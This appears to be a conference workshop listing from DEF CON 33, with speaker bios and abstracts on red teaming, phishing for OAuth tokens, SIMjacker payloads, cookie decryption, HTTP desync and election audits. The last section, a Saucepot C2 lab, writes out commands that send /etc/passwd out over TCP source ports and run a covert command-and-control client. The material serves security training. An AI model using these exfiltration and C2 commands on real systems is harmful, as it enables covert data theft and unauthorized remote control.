
In this session we will showcase how you can leverage AI to build your terraform packages for your Red Team Workshop. Make sure to bring your laptops!

Moses Frost has been working in the field since the late 90’s. Working with computers in the late 80s for fun and moving into a more professional field shortly after high school. He is a Red Team Operator at Neuvik. A senior instructor and course author at the SANS Institute, authoring and teaching the Cloud Penetration Testing Course. He also co-authors the book Gray Hat Hacking: Volume 6. He has worked at many companies, notably Cisco Systems, McAfee, and TLO. Currently, he is a Senior Operator at Neuvik. Over those years, he has enjoyed working in all parts of the IT Industry and hopes to do so for many more years.

In this 2.5-hour hands-on workshop, participants will delve into the art of reverse engineering web applications to uncover hidden security flaws. Through guided exercises, attendees will learn to deconstruct application architectures and infrastructures, gaining insights into vulnerabilities, misconfigurations, and ways to make exploitation more reliable. Whether you’re hunting for logic flaws, mapping unknown attack surfaces, or trying to make sense of a black-box app, this workshop equips you with practical strategies and mental models you can apply immediately.

The workshop includes guided mini-lessons, worksheets to reinforce key patterns, and a hands-on lab hosted remotely (or locally) where attendees apply their skills in real time. Support will be available throughout, and all materials (labs, notes, and tool recommendations) will be provided for continued practice after the session.

Hey, I’m Abraham. I’m from Mexico, currently finishing my degree in cybersecurity engineering and working as a penetration testing intern. What I like the most about cybersecurity is the community, always willing to share knowledge and help each other. I’m passionate about learning new things like music, hacking, tech, videogames and philosophy. I also enjoy meeting new people, taking on challenges like CTFs and sharing my knwoledge with others.

Andrew Wilson (aka “kuzushi”) is a seasoned application security expert, software architect, and international community builder with nearly two decades of experience across both offensive and defensive security.

Recognized as a Microsoft MVP in Azure and Developer Security from 2010–2015, Andrew has built and secured enterprise-scale systems, led one of the largest offensive security teams in the U.S., and personally conducted over 140+ web and application assessments.

Currently, Andrew is pursuing a PhD in offensive cybersecurity and AI, focusing on how mental models and context shape modern security analysis. He’s also an independent researcher, mentor, and frequent conference speaker, with past talks at defcon, ToorCon, AppSecDC, LASCON, and multiple BSides events nationwide.

A hands-on workshop on conducting Risk Limiting Audits, putting into practice the principles discussed in Philip Stark’s 4pm talk.

Philip B. Stark is Distinguished Professor of Statistics at the University of California, Berkeley, where he has served as department chair and associate dean. In 2007 he invented “risk-limiting audits” (“RLAs”), endorsed by the National Academies of Science, Engineering, and Medicine and the American Statistical Association, among others, and required or authorized by law in about 15 states. He designed and helped conduct the first dozen pilot RLAs, helped draft RLA legislation for several states, and has published open-source software to support RLAs. In 2012, he and David Wagner introduced “evidence-based elections,” a paradigm for conducting demonstrably trustworthy elections. Stark has served on the Board of Advisors of the US Election Assistance Commission and its cybersecurity subcommittee, the Board of Directors of Verified Voting Foundation and the Election Integrity Foundation, and on the California Post Election Audit Standards Working Group. He has worked with the Secretaries of State of California, Colorado, and New Hampshire and numerous local election officials. Stark has testified about election integrity in state and federal courts and to legislators. He received the IEEE Cybersecurity Award for Practice, the UC Berkeley Chancellor’s Award for Research in the Public Interest, and the John Gideon Award for Election Integrity. He is a fellow of the American Statistical Association and the Institute of Physics and a member of the American Academy of Arts and Sciences.

Come learn about and try our Micropython and microcontroller workshop, and learn about the secure boot tools for compute modules.

The workshop will begin with brief presentation about cryptocurrency, exchanges, hardware wallets, hot wallets, cold wallets, and other introductory information needed to begin cryptocurrency transactions. Participants will be given a sample wallet for practice purposes only. Participants will be guided through the opening of a wallet, with a detailed discussion on public and private keys and the different types of wallets available for self custody and the different security features of wallets. The discussion will delve into hot security topics, including the importance of randomized seeds and consider a couple of case scenarios where wallets have been hacked due to a lack of security, followed by a discussion on how to prevent these types of security defects. Next, participants will create hot and a cold wallet, each with a twelve word seed. After completing set up of the cold wallet, participants will be required to simulate a lost/stolen/destroyed wallet and wipe the wallet and re-set up the wallet.

• Decode the Signal: Breaking Down the PDU Format Learn how to dissect the raw PDUs used in SMS-based communication.
• Weaponize the Message: Crafting Custom PDU Payloads Dive into the dark arts of crafting malicious SMS payloads.
• Hunt the Signal: Detecting SIMjacker Through Forensic PDU Analysis Learn to identify signs of SIMjacker attacks in PDU traffic.
• Own the Location: Deploying a SIM-Based Tracker Applet Step-by-step build and test a location tracking applet that abuses SIM capabilities for silent positioning

This session explores advanced security mechanisms implemented by major browsers to prevent cookie theft from their storage databases. Chrome has recently implemented AppBound encryption, which provides multi-layered protection for session cookies:

1) A 2-way DPAPI encryption system that operates with both elevated NT AUTHORITY\SYSTEM permissions and normal user-level decryption capabilities;

2) A state-key encryption layer utilizing the ChaCha20Poly1305 algorithm with custom keys (that once was AES-256-GCM encrypted);

These implementations have significantly reduced the effectiveness of info-stealing malware. However, this session will demonstrate potential vulnerabilities in these security measures and explain how to obtain decrypted cookies despite these protections. We will examine the new format specifications and encryption methodologies for cookies.

Beyond Chromium-based browsers, we’ll explore Gecko’s encryption algorithms, which involve structured ASN.1 data formats with multiple encryption schemes including 3DES and AES-256. We’ll also analyze Chromium on macOS which relies on PBKDF2 key derivation, and WebKit-based browsers that store cookies in binary cookie files.

Additionally, we’ll discuss Chrome’s forthcoming “Device Bound Session Cookies” (DBSC) technology, which aims to further mitigate session hijacking through cookie theft by implementing TPM chip-based encryption and requiring proof of possession of the cryptographic key.

Rafael has been working with malware development for 4 years, also being involved in the malware community for more than 6 years. He is also experienced in Incident and Response, specifically during malware inner workings analysis. Currently, Rafael is a researcher for Hakai Offensive Security, being deeply involved with red-team operations.

The workshop revolves around phishing techniques to capture yummy cookies & refresh tokens against highly targeted Identity Providers. Instead of using server based infrastructure, we will use server-less infra to launch stealth attacks rotating trusted implicit domains & integration directly with the productivity apps like slack, teams etc.

The flow of the workshop :

• OAuth2 background & research
• Tokens & their privileges
  • Family of Client IDs (FOCI)
• Spinning server-less infra for advanced phishing
  • Terraform
  • Pulumi
• Capturing honey :
  • Cookies
  • Tokens
• Replaying tokens
  • To access other resources
• Preventive Measures & Detection

Workshop Duration : 120 Minutes

Manish Gupta is Director of CyberWarFare Labs having 7.5+ years of expertise in offensive Information Security. Where he specializes in Red Teaming Activities on enterprise Environment. His Research interest includes Real World Cyber Attack Simulation and Advanced persistent Threat (APT). Previously he has presented his research at reputed conferences like Blackhat USA, DEFCON, Nullcon, BSIDES Chapters, X33fcon, NorthSec & other corporate trainings etc.

Yash Bharadwaj is a seasoned technologist with over 7.5 years of experience, currently serving as the Technical Director & Head of R&D at CyberWarfare Labs. Passionate about offensive security, he specializes in uncovering and analyzing emerging TTPs, building Red/Blue team infrastructure and simulating Identity Based Attacks. A sought-after speaker, he has conducted hands-on training & delivered talks at prestigious conferences such as BlackHat (USA, Asia, EU), Nullcon, X33fCon, NorthSec, and various BSides chapters. A recognized thought leader, he combines technical depth with business-aligned security leadership

Modern websites have evolved into complex, layered network architectures—creating fertile ground for serious protocol-level vulnerabilities that traditional tools often overlook. As web applications continue growing in complexity, critical vulnerabilities such as HTTP smuggling, first-request routing, and cache poisoning/deception become increasingly prevalent, underscoring the need for tooling that treats HTTP as it truly is: a stream-based protocol.

Although security professionals commonly rely on HTTP proxies to intercept, analyze, and manipulate traffic, most current solutions obscure the stream-oriented nature of the protocol. By presenting HTTP interactions merely as isolated request-response transactions, crucial details—like persistent connections, pipelining, and geo-routing—are concealed, making it difficult to fully comprehend data flows or uncover advanced attack vectors.

In this session, I’ll present a new Burp extension to dive deep into the raw streams powering HTTP, turning overlooked details into powerful exploits. You’ll learn how to spot hidden proxies, exploit subtle errors to desynchronize connections, hijack requests, and uncover vulnerabilities that evade traditional tools. Through real-world case studies, I’ll reveal exactly how you can chain advanced HTTP Desync attacks to secure bounties that others have left behind—transforming complex network architectures into your own bug bounty playground!

Martin is a Security Researcher at PortSwigger with over 10 years of experience specializing in web security and reverse engineering. Renowned for presenting multiples groundbreaking researches at premier conferences like Black Hat, DEFCON and RSA. Active participant in Capture The Flag (CTF) competitions and bug bounty programs, consistently uncovering critical vulnerabilities and driving innovation in cybersecurity.

🛰️⚡ Can you keep Taiwan connected?

Come play Taiwan Digital Blockade Lite at the Maritime Hacking Village @ DEF CON 33 — a fast-paced attacker-defender wargame adapted from a US Naval War College scenario.

🎲 In a 25-30 minute dice game, you’ll face off over Taiwan’s vulnerable critical infrastructure: communications cables, power grids, satellite links.

One side launches cyberattacks, sabotage, and electronic warfare to shut it all down. The other scrambles to keep the lights and the data on.

Whether you are a seasoned ICS practitioner, or a complete noob, the game is fun, fast, and thought provoking.

Jason Vogt is an assistant professor in the Strategic and Operational Research Department, Center for Naval Warfare Studies at the United States Naval War College. Professor Vogt is a cyber warfare and wargaming expert. He has participated in the development of multiple wargames at the United States Naval War College. He previously served on active duty as an Army officer.

Attendees will get hands on with some AI pen testing techniques as based on the Instructor’s experiences from the NIST AI Pen Test Framework Challenge and industry best practices.

Lee McWhorter, Owner & Chief Geek at McWhorter Technologies, has been involved in IT since his early days and has over 30 years of experience. He is a highly sought after professional who first learned about identifying weaknesses in computer networks, systems, and software when Internet access was achieved using a modem. Lee holds an MBA and more than 20 industry certifications in such areas as System Admin, Networking, Programming, Linux, IoT, and Cybersecurity. His roles have ranged from the server room to the board room, and he has taught for numerous universities, commercial trainers, and nonprofits. Lee works closely with the Dark Arts Village at RSAC, Red Team Village at DEFCON, Texas Cyber Summit, CompTIA, and the CompTIA Instructor Network as a Speaker, SME, and Instructor.

This session will walk you through setting up a mobile testing environment and extracting APKs from installed apps. You’ll also explore how to locate and analyze sensitive data stored locally, including shared preferences, databases, and more.

Grigoris is a Senior Training Developer at Hack The Box. He is passionate about Mobile Security and creating innovative content for cybersecurity Training. In addition to his role, Grigoris also teaches Mobile Application Security at the University of Piraeus. He graduated with an M.Sc. degree in Digital Systems Security, and he holds a B.Sc. in Computer Science with a specialization in Software Development. Grigoris has previously worked as a Penetration Tester, and he has been one of the founders and a core member of the cybersecurity research group INSSec at the University of West Attica since 2019.

Twenty‑four months ago we presented the Black Hat talk “Evil Digital Twin” in which we demonstrated how large language models (LLMs) could readily exploit the cognitive vulnerabilities of users, and that humans would perceive AI as sentient long before true artificial general intelligence emerge. Join us for this two‑hour workshop as we walk you through the basic architecture of human digital twins (HDTs), trained on the core patterns of human individuals, may be deployed to simulate both the targets of social engineering attacks or operate as high-fidelity honey pots. We also explore a coming future of persistent cognitive cyber‑warfare, escalating as the cost of deception approaches zero and the attack surface shifts from networks to minds. Audience members will interact with SCOTOBOT (a human digital twin of a Supreme Court Justice), meet a perfect AI assistant for insider threat, and leave with a NIST research‑based LLM that speaks in phishing emails.

Dr. Matthew Canham is the Executive Director of the Cognitive Security Institute and a former Supervisory Special Agent with the Federal Bureau of Investigation (FBI), he has a combined twenty-one years of experience in conducting research in cognitive security and human-technology integration. He currently holds an affiliated faculty appointment with George Mason University, where his research focuses on the cognitive factors in synthetic media social engineering and online influence campaigns. He was previously a research professor with the University of Central Florida, School of Modeling, Simulation, and Training’s Behavioral Cybersecurity program.

His work has been funded by NIST (National Institute of Standards and Technology), DARPA (Defense Advanced Research Projects Agency), and the US Army Research Institute. He has provided cognitive security awareness training to the NASA Kennedy Space Center, DARPA, MIT, US Army DevCom, the NATO Cognitive Warfare Working Group, the Voting and Misinformation Villages at DefCon, and the Black Hat USA security conference. He holds a PhD in Cognition, Perception, and Cognitive Neuroscience from the University of California, Santa Barbara, and SANS certifications in mobile device analysis (GMOB), security auditing of wireless networks (GAWN), digital forensic examination (GCFE), and GIAC Security Essentials (GSEC).

Hands-on access to real voting systems

This workshop explores how the Kestrel can be innovatively used for hunting advanced threats in critical infrastructures using offensive security methodologies, the workshop delves into techniques and strategies that simulate real-world adversary attacks while also identifying vulnerabilities and anomalous behaviors with offensive techniques before they are exploited in a real scenario. This workshop will perform controlled and simulated attacks, such as network intrusion, data exfiltration, and persistence, to generate artifacts that will serve as the foundation for active threat hunting. We will configure and calibrate Kestrel to identify anomalous patterns within network traffic and system interactions, correlating these patterns with MITRE ATT&CK tactics.

This workshop will innovative the methodology for integrating the Kestrel tool into a threat hunting process within offensive techniques, providing new ways of thinking about advanced threat detection and proactive security

Daniel Benavides (Edad: 27), es un experimentado profesional en ciberseguridad con más de 7 años de experiencia en el sector. Durante 4 años y medio, trabajó como Administrador de Sistemas (SysAdmin) para el gobierno de El Salvador, donde fue responsable de la gestión y seguridad de infraestructuras críticas y sistemas gubernamentales. Posteriormente, durante 3 años, se desempeñó como Supervisor de un Security Operations Center (SOC) en RSM US LLP, una destacada firma de consultoría norteamericana, donde lideró equipos en la vigilancia, detección y respuesta a incidentes de seguridad.

Actualmente, Daniel ocupa el rol de Consultor XDR Senior en Palo Alto Networks, donde aplica su experiencia en la implementación y optimización de soluciones avanzadas de detección y respuesta extendida (XDR). Su trabajo se centra en la respuesta a incidentes, la cacería de amenazas, el análisis avanzado de amenazas y la creación de reglas de detección basadas en información de ciberinteligencia, contribuyendo a fortalecer la seguridad de sus clientes.

Su formación académica incluye un grado en Ingeniería en Sistemas de la Universidad Don Bosco en El Salvador, y una Diplomatura en Ciberinteligencia obtenida en España, que complementan sus conocimientos técnicos y estratégicos. Además, Daniel cuenta con una serie de certificaciones profesionales que avalan su pericia en el campo: las certificaciones CompTIA Security+, CompTIA CySA+, certificación en la nube de AWS CLF-C02; así como certificaciones específicas de XDR de Stellar Cyber y Palo Alto Cortex.

Fuera del ámbito profesional, Daniel es un apasionado del Brazilian Jiu Jitsu, en el cual ostenta el cinturón azul, y participa activamente en competencias de Capture The Flag (CTF), demostrando su habilidad en la resolución de desafíos de seguridad. También dedica tiempo a explorar la plataforma de ciberseguridad TryHackMe, donde sigue perfeccionando sus habilidades y conocimientos. Además, le encanta viajar por el mundo, lo que le permite explorar nuevas culturas y perspectivas.

El conjunto de su experiencia profesional, habilidades técnicas avanzadas, formación académica y sus variadas aficiones lo posicionan como un experto integral en el ámbito de la ciberseguridad, con una sólida trayectoria en la protección de sistemas y la gestión de operaciones de seguridad.

Ronald González: Offensive Security Investigator, Threat Hunter and Incident Response, Digital Forensic and SecDevOps with more than 10 years of experience in computer systems, he has been a Government Forensic Expert with specialization in the scene of computer crimes and now as an individual. He is a national and international consultant helping organizations find vulnerabilities. Ronald holds a few recognized certifications including CPTS from HackTheBox, GoogleSecOps, CHFI. He is the leader of the group DEF CON DC11503, HackTheBox El Salvador and BSides El Salvador, and speaker at DEFCON Red Team Village 32, TEDx and many other conference as well

Port knocking is a stealthy network authentication technique (T1205.001) in which a client sends a specific sequence of connection attempts (or “knocks”) to closed ports on a server. When the correct sequence is received, the server dynamically opens a port or triggers an action, enabling concealed access or communication. Saucepot C2 elevates the port knocking technique to a new level. Instead of using destination ports (DstPorts) in TCP sessions as knock sequences, it leverages source ports (SrcPorts), also known as ephemeral ports. This approach allows data exfiltration even in highly restrictive firewall environments where only a single outbound port, such as port 443, is allowed.

In this workshop, attendees will use Saucepot C2 in conjunction with the following MITRE ATT&CK techniques to conduct specific Red Team activities:

Saucepot C2 has been open-sourced at https://github.com/netskopeoss/saucepot. Supported commands or features in Sacuepot C2 include: – Check-in / heartbeat – Directory listing – Process listing – File upload

Hardware requirements

• One AWS EC2 t3.micro (or equivalent) VPC instance with at least 1 GB of RAM and 8 GB of storage to serve as the server
• One AWS EC2 t3.micro (or equivalent) VPC instance (easier option), or a laptop (more difficult option), to serve as the client

Software requirements

Server: sudo apt install net-tools knockd nginx python3-pip python3-scapy git clone https://github.com/netskopeoss/saucepot echo "v2025.8" | sudo tee /var/www/html/chk-version

Client: sudo apt install net-tools python3-tqdm python3-psutil python3-pycurl git clone https://github.com/netskopeoss/saucepot

Workshop details

• Exercise 1: Traditional port knocking Reveal a web server running on port 80 using the port knocking technique. Once the correct knock sequence is provided, the firewall will be temporarily lifted for that specific client.

Server: Hide the web server until the correct knock sequences (4100, 4200, 4500) have been provided.

sudo iptables -I INPUT -p tcp --dport 80 -j REJECT sudo systemctl start nginx

Add the following section to /etc/knockd.conf [OpenCloseSecretWeb] sequence = 4100,4200,4500 seq_timeout = 30 tcpflags = syn start_command = /usr/sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT cmd_timeout = 7200 stop_command = /usr/sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT

If the default interface is not eth0, add Interface = InterfaceName to the [options] section.

Restart the knockd: sudo systemctl restart knockd

Client:

The protected web service should be unreachable by default.

curl http://server_public_ip

Provide the correct knock sequences; the protected web service should now be reachable.

for f in 4100 4200 4500; do nc -w2 server_public_ip $f; done curl http://server_public_ip

• Exercise 2: Ephemeral port checker Check whether you’re in a friendly environment where the client’s source port is preserved after NAT, a crucial requirement for ephemeral port abuse to work. If the laptop’s network environment fails the test, an additional VPC instance will be needed to act as the client.

  Server: sudo systemctl stop nginx sudo python3 saucepot-server.py -c -p 80

  Client: “` python3 saucepot-client.py -c -d server_public_ip -p 80

  Test 1 with ephemeral port 63034: PASS Test 2 with ephemeral port 51151: PASS Test 3 with ephemeral port 54321: PASS

  Ephemeral port test succeeded. Enjoy Port Knocking 2.0 technique! “`

• Exercise 3: Data exfiltration Exfiltrate a specified file to the server without establishing persistent TCP connections. The connection state is managed through different port-knocking sequences, such as session-start and session-end. The data to be exfiltrated is transmitted via the source port (SrcPort) field of TCP packets within a designated port range.

  Server: sudo python3 saucepot-server.py -d 172.31.253.199 -p 80

  Client: Exfiltrate /etc/passwd to the server

  python3 saucepot-client.py -d server_public_ip -p 80 --upload /etc/passwd

• Exercise 4: Command-and-control operations To achieve bidirectional communication, the Last-Modified header in HTTP responses is used to deliver C2 commands to the client. Saucepot C2 currently supports a few simple commands, such as ls, ps, and others.

  Server: sudo systemctl start nginx sudo python3 saucepot-server.py -d 172.31.253.199 -p 80

  Client: python3 saucepot-client.py -d server_public_ip -p 80

• Exercise 5: Observation of anomalies at L4 and L7 Observe the anomalies at L4 and L7

  On the server, in two separate windows:

  web access log: tail -F /var/log/nginx/access.log

  SYN packets: sudo tcpdump -i enX0 -n 'tcp[tcpflags] & tcp-syn != 0'

This workshop has been verified on Ubuntu 24.04 LTS

Troubleshoot Guide:

• Python packages required
• VPC instance’s inbound firewall to allow 80/tcp and those used in traditional port-knock sequences
• Use VPC instance NIC’s private IP address in exercise 3 & 4 for the -d ip arg on Server

Hubert Lin is an offensive security expert specializing in remote vulnerability exploitation, honeypots, and penetration testing. He previously led a signature team for network threat defense and served as a senior staff engineer on a Red Team, where he evaluated network intrusion prevention systems and conducted sanctioned red team exercises to strengthen corporate security. Hubert holds certifications as a Red Hat Certified Engineer (RHCE) and an Offensive Security Certified Professional (OSCP). Currently, he works at Netskope as a Principal Researcher and has talked at DEFCON Cloud Village, RSAC, BSidesLV, BSidesSG, Australian CyberCon, GovWare, and CYBERSEC in the past few years.